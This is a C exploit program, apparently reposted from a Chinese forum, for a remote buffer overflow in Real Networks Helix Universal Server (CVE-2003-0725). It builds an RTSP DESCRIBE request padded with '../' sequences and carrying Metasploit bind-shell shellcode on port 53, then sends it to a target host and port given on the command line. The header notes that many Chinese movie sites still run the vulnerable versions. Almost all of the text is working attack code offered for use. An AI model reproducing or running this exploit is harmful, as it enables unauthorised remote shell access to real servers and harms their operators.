复制内容到剪贴板
代码:
/******************************************************************************/
Real Networks Helix Universal Server Vsrc3260.dll Remote Buffer Overflow Vulnerability Exploit
by cocoruder(frankruder_at_hotmail.com),2007.04.27
[url]http://ruder.cdut.net[/url]
References:
[url]http://www.securityfocus.com/bid/8476/[/url]
[url]http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0725[/url]
A so old but very interesting vulnerability,
Notice that there are still many movie sites in China using the affected versions...
Test successfully on Real Networks Helix Universal Server 9.0.2.794 + Windows 2000 SP4, enjoy it:)
******************************************************************************/
#include
#include
unsigned char buff_exploit_bind_port53[]=
"DESCRIBE "
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"%20%20" //valid code
"AAAA"
/* win32_bind - EXITFUNC=thread LPORT=53 Size=696 Encoder=Alpha2 [url]http://metasploit.com[/url] */
"%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%48%49%49%49%49"
"%49%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%46"
"%58%50%30%42%31%42%41%6b%42%41%56%42%32%42%41%32"
"%41%41%30%41%41%58%50%38%42%42%75%7a%49%4b%4c%42"
"%4a%58%6b%52%6d%39%78%6b%49%6b%4f%39%6f%69%6f%31"
"%70%6e%6b%30%6c%74%64%77%54%6e%6b%42%65%47%4c%6c"
"%4b%31%6c%54%45%32%58%36%61%4a%4f%4c%4b%30%4f%55"
"%48%4e%6b%41%4f%57%50%67%71%5a%4b%30%49%6e%6b%76"
"%54%4c%4b%73%31%58%6e%65%61%4f%30%4d%49%4e%4c%4f"
"%74%6b%70%63%44%57%77%6b%71%59%5a%56%6d%74%41%6b"
"%72%6a%4b%4a%54%67%4b%66%34%35%74%66%48%73%45%38"
"%65%6e%6b%63%6f%31%34%47%71%6a%4b%71%76%6e%6b%66"
"%6c%70%4b%6e%6b%51%4f%55%4c%54%41%58%6b%47%73%76"
"%4c%6e%6b%4c%49%52%4c%41%34%37%6c%31%71%79%53%65"
"%61%39%4b%75%34%4e%6b%61%53%64%70%6e%6b%73%70%56"
"%6c%4c%4b%32%50%77%6c%6e%4d%6e%6b%33%70%76%68%33"
"%6e%43%58%6c%4e%30%4e%44%4e%7a%4c%70%50%6b%4f%5a"
"%76%35%36%50%53%55%36%52%48%70%33%37%42%33%58%52"
"%57%54%33%34%72%31%4f%33%64%69%6f%4e%30%72%48%4a"
"%6b%5a%4d%4b%4c%37%4b%52%70%6b%4f%6a%76%61%4f%6b"
"%39%4b%55%50%66%6e%61%58%6d%36%68%33%32%62%75%43"
"%5a%37%72%49%6f%6e%30%72%48%5a%79%63%39%4b%45%4c"
"%6d%33%67%49%6f%4a%76%53%63%63%63%73%63%76%33%71"
"%43%52%63%70%53%31%53%32%73%6b%4f%48%50%70%66%42"
"%48%73%30%67%45%71%76%56%33%6c%49%4d%31%4e%75%32"
"%48%69%34%35%4a%32%50%58%47%36%37%4b%4f%6b%66%63"
"%5a%72%30%31%41%62%75%6b%4f%78%50%70%68%6e%44%6c"
"%6d%64%6e%5a%49%51%47%6b%4f%4b%66%72%73%66%35%4b"
"%4f%4e%30%62%48%48%65%52%69%6b%36%73%79%52%77%49"
"%6f%6e%36%32%70%31%44%72%74%52%75%49%6f%68%50%7a"
"%33%45%38%79%77%31%69%4f%36%33%49%72%77%6b%4f%6e"
"%36%70%55%59%6f%7a%70%75%36%31%7a%41%74%70%66%41"
"%78%30%63%30%6d%6c%49%79%75%73%5a%32%70%70%59%74"
"%69%4a%6c%4f%79%6d%37%73%5a%31%54%6c%49%38%62%47"
"%41%59%50%6a%53%4c%6a%39%6e%71%52%44%6d%59%6e%42"
"%62%36%4c%4f%63%4c%4d%70%7a%45%68%4e%4b%6e%4b%6e"
"%4b%52%48%41%62%79%6e%4d%63%36%76%39%6f%62%55%32"
"%64%79%6f%4e%36%61%4b%33%67%43%62%61%41%52%71%76"
"%31%32%4a%77%71%62%71%56%31%70%55%70%51%69%6f%5a"
"%70%31%78%6e%4d%69%49%77%75%6a%6e%36%33%6b%4f%4e"
"%36%43%5a%4b%4f%59%6f%30%37%79%6f%4e%30%6c%4b%56"
"%37%6b%4c%4e%63%6b%74%61%74%4b%4f%4a%76%42%72%79"
"%6f%4e%30%43%58%68%6f%48%4e%4b%50%33%50%51%43%59"
"%6f%5a%76%79%6f%38%50%46"
"aa2.rm RTSP/1.0\x0D\x0A"
"\x0D\x0A";
unsigned char recvbuff[4000];
void main(int argc,char **argv)
{
WSADATA ws;
SOCKET sock;
struct sockaddr_in server;
DWORD ret;
WSAStartup(MAKEWORD(2,2),&ws);
sock=socket(AF_INET,SOCK_STREAM,0);
if (sock<=0)
{
printf("socket error!\n");
return;
}
server.sin_family = AF_INET;
server.sin_port = htons((USHORT)atoi(argv[2]));
server.sin_addr.s_addr = inet_addr(argv[1]);
if (connect(sock, (struct sockaddr *)&server,sizeof(server)) == -1)
{
printf("connet error\n");
closesocket(sock);
return;
}
printf("sending exploit packet...\n");
//send packet DESCRIBE
ret=send(sock,(char *)buff_exploit_bind_port53,sizeof(buff_exploit_bind_port53)-1,0);
if (ret==SOCKET_ERROR)
{
printf("send error!\n");
return;
}
memset(recvbuff,0,sizeof(recvbuff));
ret=recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
closesocket(sock);
}
